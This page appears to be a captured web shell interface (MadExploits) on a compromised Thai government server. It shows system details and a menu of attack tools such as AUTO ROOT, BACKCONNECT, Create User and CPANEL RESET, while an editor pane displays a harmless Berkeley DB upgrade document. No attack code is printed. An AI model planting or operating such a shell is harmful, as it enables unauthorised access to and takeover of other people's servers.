Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
db4-devel-4.7.25 /
ref /
upgrade.3.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
btstat.html
3.32
KB
-rw-r--r--
config.html
2.61
KB
-rw-r--r--
disk.html
2.38
KB
-rw-r--r--
dup.html
2.07
KB
-rw-r--r--
env.html
4.41
KB
-rw-r--r--
intro.html
1.63
KB
-rw-r--r--
log_register.html
1.9
KB
-rw-r--r--
logalloc.html
1.77
KB
-rw-r--r--
memp_register.html
1.95
KB
-rw-r--r--
put.html
3.59
KB
-rw-r--r--
set_feedback.html
1.96
KB
-rw-r--r--
set_paniccall.html
1.85
KB
-rw-r--r--
set_tx_recover.html
2.26
KB
-rw-r--r--
sysmem.html
1.76
KB
-rw-r--r--
tcl.html
1.97
KB
-rw-r--r--
tmp.html
2.23
KB
-rw-r--r--
toc.html
2.25
KB
-rw-r--r--
txn_check.html
1.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : btstat.html
<!--$Id: btstat.so,v 1.12 2003/10/18 19:16:15 bostic Exp $--> <!--Copyright (c) 1997,2008 Oracle. All rights reserved.--> <!--See the file LICENSE for redistribution information.--> <html> <head> <title>Berkeley DB Reference Guide: Release 3.1: DB->stat</title> <meta name="description" content="Berkeley DB: An embedded database programmatic toolkit."> <meta name="keywords" content="embedded,database,programmatic,toolkit,btree,hash,hashing,transaction,transactions,locking,logging,access method,access methods,Java,C,C++"> </head> <body bgcolor=white> <table width="100%"><tr valign=top> <td><b><dl><dt>Berkeley DB Reference Guide:<dd>Upgrading Berkeley DB Applications</dl></b></td> <td align=right><a href="../upgrade.3.1/dup.html"><img src="../../images/prev.gif" alt="Prev"></a><a href="../toc.html"><img src="../../images/ref.gif" alt="Ref"></a><a href="../upgrade.3.1/sysmem.html"><img src="../../images/next.gif" alt="Next"></a> </td></tr></table> <p align=center><b>Release 3.1: DB->stat</b></p> <p>For Btree database statistics, the <a href="../../api_c/db_stat.html">DB->stat</a> method field <b>bt_nrecs</b> has been removed, replaced by two fields: <b>bt_nkeys</b> and <b>bt_ndata</b>. The <b>bt_nkeys</b> field returns a count of the unique keys in the database. The <b>bt_ndata</b> field returns a count of the key/data pairs in the database. Neither exactly matches the previous value of the <b>bt_nrecs</b> field, which returned a count of keys in the database, but, in the case of Btree databases, could overcount as it sometimes counted duplicate data items as unique keys. The application should be searched for any uses of the <b>bt_nrecs</b> field and the field should be changed to be either <b>bt_nkeys</b> or <b>bt_ndata</b>, whichever is more appropriate.</p> <p>For Hash database statistics, the <a href="../../api_c/db_stat.html">DB->stat</a> method field <b>hash_nrecs</b> has been removed, replaced by two fields: <b>hash_nkeys</b> and <b>hash_ndata</b>. The <b>hash_nkeys</b> field returns a count of the unique keys in the database. The <b>hash_ndata</b> field returns a count of the key/data pairs in the database. The new <b>hash_nkeys</b> field exactly matches the previous value of the <b>hash_nrecs</b> field. The application should be searched for any uses of the <b>hash_nrecs</b> field, and the field should be changed to be <b>hash_nkeys</b>.</p> <p>For Queue database statistics, the <a href="../../api_c/db_stat.html">DB->stat</a> method field <b>qs_nrecs</b> has been removed, replaced by two fields: <b>qs_nkeys</b> and <b>qs_ndata</b>. The <b>qs_nkeys</b> field returns a count of the unique keys in the database. The <b>qs_ndata</b> field returns a count of the key/data pairs in the database. The new <b>qs_nkeys</b> field exactly matches the previous value of the <b>qs_nrecs</b> field. The application should be searched for any uses of the <b>qs_nrecs</b> field, and the field should be changed to be <b>qs_nkeys</b>.</p> <table width="100%"><tr><td><br></td><td align=right><a href="../upgrade.3.1/dup.html"><img src="../../images/prev.gif" alt="Prev"></a><a href="../toc.html"><img src="../../images/ref.gif" alt="Ref"></a><a href="../upgrade.3.1/sysmem.html"><img src="../../images/next.gif" alt="Next"></a> </td></tr></table> <p><font size=1>Copyright (c) 1996,2008 Oracle. All rights reserved.</font> </body> </html>
Close